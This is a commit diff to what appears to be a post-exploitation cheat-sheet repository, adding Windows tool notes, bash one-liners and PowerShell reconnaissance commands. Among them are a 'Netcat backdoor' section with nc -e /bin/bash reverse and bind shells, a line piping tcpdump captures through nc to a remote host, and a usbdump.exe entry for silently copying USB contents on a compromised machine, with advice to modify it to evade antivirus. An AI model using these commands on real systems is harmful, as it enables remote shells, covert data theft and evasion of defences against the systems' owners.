Initial port of commands over from Google Docs

bins/windows/index.md

@@ -0,0 +1,7 @@
+# Useful Windows Binaries
+
+Useful Windows binary tools that can be used for post exploitation.
+
+|    Tool     | Description / Importance | Contributer |
+| ----------- | ------------------------ | ----------- |
+| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | 

scripting/bash.md

@@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
 tcpdump -w - | nc -v 8.8.8.8 9999
 ```
 
-**Recursively search for files within a directory**
+**Recursively search for text contained in files within a directory**
 ```bash
 zcat -rf ./* | grep "searchstring"
 ```
 
+**Recursively search for files with the specified word within them**
+*Submitted by cat on Google Fourms*
+```bash
+ls -a | find | grep -i "string"
+```
+
+**Netcat backdoor**
+*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)*
+```bash
+nc -e /bin/bash *remotecomputer* *port*
+OR
+nc -e /bin/bash -lp *port*
+```
+
+**View CPU Information**
+```bash
+cat /proc/cpuinfo
+```
+
 Credits
 -----------
-Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions
+Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)
 

scripting/powershell.md

@@ -83,4 +83,51 @@ tingSystem=*Server*))" |select name`
  * **Output**:
    * <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>name<br>----<br>PWNT-DC<br>
 Exchange1<br>
-SharePoint1</code></div> 
+SharePoint1</code></div>
+
+ ### Get Info About All Connected Drives
+ * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()`
+ * **Output**:
+   * <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>
+	Name : C:\
+	DriveType : Fixed
+	DriveFormat : NTFS
+	IsReady : True
+	AvailableFreeSpace : 111111111111
+	TotalFreeSpace : 111111111111
+	TotalSize : 111111111111
+	RootDirectory : C:\
+	VolumeLabel : HP
+	<br />
+	Name : D:\
+	DriveType : Fixed
+	DriveFormat : NTFS
+	IsReady : True
+	AvailableFreeSpace : 111111111111
+	TotalFreeSpace : 111111111111
+	TotalSize : 111111111111
+	RootDirectory : D:\
+	VolumeLabel : DATA
+	<br />
+	Name : E:\
+	DriveType : CDRom
+	DriveFormat :
+	IsReady : False
+	AvailableFreeSpace :
+	TotalFreeSpace :
+	TotalSize :
+	RootDirectory : E:\
+	VolumeLabel :
+    </code></div>
+
+ ### Retrieve BIOS Information (including system serial number)
+ * **Command with arguments**: `gwmi win32_bios`
+ * **Output**:
+   * <div class="slide" style="cursor: pointer;"> **Windows 7:** Show/Hide</div><div class="view"><code>
+	SMBIOSBIOSVersion : 6.0
+	Manufacturer : Phoenix Technologies LTD
+	Name : PheonixBIOS 4.0 Release 6.0
+	SerialNumber : XXXXXXXXXXXXXXXXXXXXXX
+	Version : XXXXXX - XXXXXXX
+    </code></div>
+